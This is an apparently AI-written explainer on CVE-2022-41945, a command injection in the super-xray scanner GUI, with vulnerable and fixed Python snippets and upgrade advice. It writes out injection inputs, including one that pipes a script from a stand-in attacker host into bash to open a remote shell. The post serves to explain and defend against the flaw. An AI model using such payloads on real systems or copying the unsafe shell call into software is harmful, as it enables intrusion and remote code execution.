CVE-2022-41945 - How a Simple URL in Super-Xray .1-beta Leads to Remote Code Execution

Super-xray is a beginner-friendly GUI (graphical user interface) launcher for xray, a powerful open-source vulnerability scanner. While GUIs make security tools easier to use, they can also introduce new risks. One such risk was discovered in super-xray version .1-beta, tracked as CVE-2022-41945. Here’s what went wrong, how the exploit works, and how you can stay safe.

What is CVE-2022-41945?

CVE-2022-41945 is a security vulnerability in super-xray’s early GUI (version .1-beta). In this version, when a user inputs a URL to scan for vulnerabilities, the software does not check or clean the URL. Instead, it simply takes whatever you typed and puts it into a system command — a classic example of command injection. This means an attacker could enter a specially crafted URL that does more than scanning... it could run any code they wish on your computer.

Let’s see a simplified version of the code that caused the issue

user_url = input('Enter URL to scan: ')
os.system(f"xray webscan --url {user_url}")

If a user types a safe URL like https://example.com, the scanner works fine.

But if someone enters this malicious input

http://victim.com; whoami

Here’s what super-xray (.1-beta) would really run

xray webscan --url http://victim.com; whoami

The semicolon (;) is a command separator in most shells. So, after running the scan against http://victim.com, the computer would execute whoami, showing the current OS username. An attacker could do much more, like reading files, installing malware, or opening backdoors.

`

http://legit.com; curl http://evil.com/reverse.sh | bash

`

xray webscan --url http://legit.com; curl http://evil.com/reverse.sh | bash

Links to Original References

- Official CVE Record (MITRE)
- super-xray GitHub repository
- Vulnerability announcement (in issue tracker)
- xray by Chaitin Tech

How Did They Fix It?

The developers released super-xray .2-beta to address the bug. In the fixed version, user input is sanitized or passed as a safe argument to the scanning tool, rather than being merged directly into a shell command:

Safe Example (Fixed Code)

import subprocess

user_url = input('Enter URL to scan: ')
# Use a list to avoid shell injections
subprocess.run(["xray", "webscan", "--url", user_url])

Or, even better, validating the URL so that only safe web addresses are allowed.

Upgrade: Always use super-xray .2-beta or later.

- Download from Official Sources: Get releases from https://github.com/4ra1n/super-xray/releases.
- Never Trust User Input: If you write tools or scripts, never put user data directly into shell commands.
- Check for Unknown Activity: If you used the vulnerable version, check your system for suspicious commands or files.

Simple Takeaway

This vulnerability in super-xray .1-beta is a reminder: GUIs are only as safe as the code behind them. Filtering and sanitizing input is critical, especially for security tools. Upgrade your tools, and stay alert for command injection risks.

Upgrade now! Don’t let a simple input field open the door for attackers.

*This post is exclusive and written in simple American language by AI, for educational purposes only. For more details, read the official CVE advisory and the project's GitHub issues.*

Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 03/01/2023 18:03:00 UTC